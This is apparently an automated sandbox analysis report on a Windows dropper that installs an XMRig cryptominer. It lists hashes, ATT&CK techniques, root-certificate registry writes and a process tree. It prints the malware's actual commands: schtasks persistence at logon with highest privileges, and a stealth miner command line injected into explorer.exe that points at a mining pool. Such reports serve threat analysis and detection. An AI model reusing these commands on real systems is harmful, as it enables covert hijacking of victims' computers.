xmrig | de5d543be8cd62ef0b23cfba8d9e6bd867be8d642099bd7eea4cef872b91d46d

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7v20210410
submitted
19-07-2021 21:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210719-222908.exe
Size

3.2MB
MD5

379b06514e47a54d8a7ce19bd82e16bf
SHA1

a43d359cb07311c9bafd99e8d26501d1c76e4e4f
SHA256

de5d543be8cd62ef0b23cfba8d9e6bd867be8d642099bd7eea4cef872b91d46d
SHA512

c5c943cb027e60ebbde20cfc9bae6b2fd74de18dfaf30cf406ce4bacad209d1c8fe02286bf45ca481cfb3301a0eb2578d5b62458380154c776a49915f2146847

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1216-219-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1216-229-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

1.exeservices64.exe2.exesihost64.exeservices32.exesihost32.exe

pid process

1984 1.exe
1172 services64.exe
436 2.exe
1832 sihost64.exe
1356 services32.exe
1984 sihost32.exe
Loads dropped DLL 6 IoCs

Processes:

mixazed_20210719-222908.exe1.exeservices64.exe2.exeservices32.exe

pid process

1756 mixazed_20210719-222908.exe
1984 1.exe
1756 mixazed_20210719-222908.exe
1172 services64.exe
436 2.exe
1356 services32.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 1172 set thread context of 1216 1172 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1216 schtasks.exe
1136 schtasks.exe
1284 schtasks.exe
1740 schtasks.exe

pid	process
1984	1.exe
1172	services64.exe
436	2.exe
1832	sihost64.exe
1356	services32.exe
1984	sihost32.exe

pid	process
1756	mixazed_20210719-222908.exe
1984	1.exe
1756	mixazed_20210719-222908.exe
1172	services64.exe
436	2.exe
1356	services32.exe

description	pid	process	target process
PID 1172 set thread context of 1216	1172	services64.exe	explorer.exe

pid	process
1216	schtasks.exe
1136	schtasks.exe
1284	schtasks.exe
1740	schtasks.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

services64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	services64.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

1.exeservices64.exe2.exeservices32.exe

pid process

1984 1.exe
1172 services64.exe
436 2.exe
1356 services32.exe

pid	process
1984	1.exe
1172	services64.exe
436	2.exe
1356	services32.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

1.exeservices64.exe2.exeservices32.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1984	1.exe
Token: SeDebugPrivilege	1172	services64.exe
Token: SeDebugPrivilege	436	2.exe
Token: SeDebugPrivilege	1356	services32.exe
Token: SeLockMemoryPrivilege	1216	explorer.exe
Token: SeLockMemoryPrivilege	1216	explorer.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

mixazed_20210719-222908.exe1.execmd.exeservices64.execmd.exe2.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 1756 wrote to memory of 1984	1756	mixazed_20210719-222908.exe	1.exe
PID 1756 wrote to memory of 1984	1756	mixazed_20210719-222908.exe	1.exe
PID 1756 wrote to memory of 1984	1756	mixazed_20210719-222908.exe	1.exe
PID 1756 wrote to memory of 1984	1756	mixazed_20210719-222908.exe	1.exe
PID 1984 wrote to memory of 320	1984	1.exe	cmd.exe
PID 1984 wrote to memory of 320	1984	1.exe	cmd.exe
PID 1984 wrote to memory of 320	1984	1.exe	cmd.exe
PID 320 wrote to memory of 1216	320	cmd.exe	schtasks.exe
PID 320 wrote to memory of 1216	320	cmd.exe	schtasks.exe
PID 320 wrote to memory of 1216	320	cmd.exe	schtasks.exe
PID 1984 wrote to memory of 1172	1984	1.exe	services64.exe
PID 1984 wrote to memory of 1172	1984	1.exe	services64.exe
PID 1984 wrote to memory of 1172	1984	1.exe	services64.exe
PID 1756 wrote to memory of 436	1756	mixazed_20210719-222908.exe	2.exe
PID 1756 wrote to memory of 436	1756	mixazed_20210719-222908.exe	2.exe
PID 1756 wrote to memory of 436	1756	mixazed_20210719-222908.exe	2.exe
PID 1756 wrote to memory of 436	1756	mixazed_20210719-222908.exe	2.exe
PID 1172 wrote to memory of 1948	1172	services64.exe	cmd.exe
PID 1172 wrote to memory of 1948	1172	services64.exe	cmd.exe
PID 1172 wrote to memory of 1948	1172	services64.exe	cmd.exe
PID 1948 wrote to memory of 1136	1948	cmd.exe	schtasks.exe
PID 1948 wrote to memory of 1136	1948	cmd.exe	schtasks.exe
PID 1948 wrote to memory of 1136	1948	cmd.exe	schtasks.exe
PID 1172 wrote to memory of 1832	1172	services64.exe	sihost64.exe
PID 1172 wrote to memory of 1832	1172	services64.exe	sihost64.exe
PID 1172 wrote to memory of 1832	1172	services64.exe	sihost64.exe
PID 436 wrote to memory of 1248	436	2.exe	cmd.exe
PID 436 wrote to memory of 1248	436	2.exe	cmd.exe
PID 436 wrote to memory of 1248	436	2.exe	cmd.exe
PID 1248 wrote to memory of 1284	1248	cmd.exe	schtasks.exe
PID 1248 wrote to memory of 1284	1248	cmd.exe	schtasks.exe
PID 1248 wrote to memory of 1284	1248	cmd.exe	schtasks.exe
PID 436 wrote to memory of 1356	436	2.exe	services32.exe
PID 436 wrote to memory of 1356	436	2.exe	services32.exe
PID 436 wrote to memory of 1356	436	2.exe	services32.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1172 wrote to memory of 1216	1172	services64.exe	explorer.exe
PID 1356 wrote to memory of 1104	1356	services32.exe	cmd.exe
PID 1356 wrote to memory of 1104	1356	services32.exe	cmd.exe
PID 1356 wrote to memory of 1104	1356	services32.exe	cmd.exe
PID 1356 wrote to memory of 1984	1356	services32.exe	sihost32.exe
PID 1356 wrote to memory of 1984	1356	services32.exe	sihost32.exe
PID 1356 wrote to memory of 1984	1356	services32.exe	sihost32.exe
PID 1104 wrote to memory of 1740	1104	cmd.exe	schtasks.exe
PID 1104 wrote to memory of 1740	1104	cmd.exe	schtasks.exe
PID 1104 wrote to memory of 1740	1104	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1756

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:1216

C:\Users\Admin\appdata\local\temp\services64.exe
"C:\Users\Admin\appdata\local\temp\services64.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:1136

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1832

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum+tcp://xmr.viabtc.com:8888 --user=Slicem --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=1 --cinit-idle-cpu=40 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1248

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:1284

C:\Users\Admin\appdata\local\temp\services32.exe
"C:\Users\Admin\appdata\local\temp\services32.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:1740

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:1984

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\services32.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
a891eeeb9726b351e7b8774a0711b01d

SHA1
6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

SHA256
41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

SHA512
600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
767b138625feab1d12a2a5ca186fe2a0

SHA1
129f88e5a21e167adbc8c156aa25f8514de82bfc

SHA256
97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

SHA512
d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
a891eeeb9726b351e7b8774a0711b01d

SHA1
6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

SHA256
41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

SHA512
600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
767b138625feab1d12a2a5ca186fe2a0

SHA1
129f88e5a21e167adbc8c156aa25f8514de82bfc

SHA256
97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

SHA512
d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

Download Submit
\??\c:\users\admin\appdata\local\temp\rarsfx0\1.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
\??\c:\users\admin\appdata\local\temp\rarsfx0\2.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
\??\c:\users\admin\appdata\local\temp\services32.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
\??\c:\users\admin\appdata\local\temp\services64.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
MD5
846b9e20fc1ea8d299069866bf46ed41
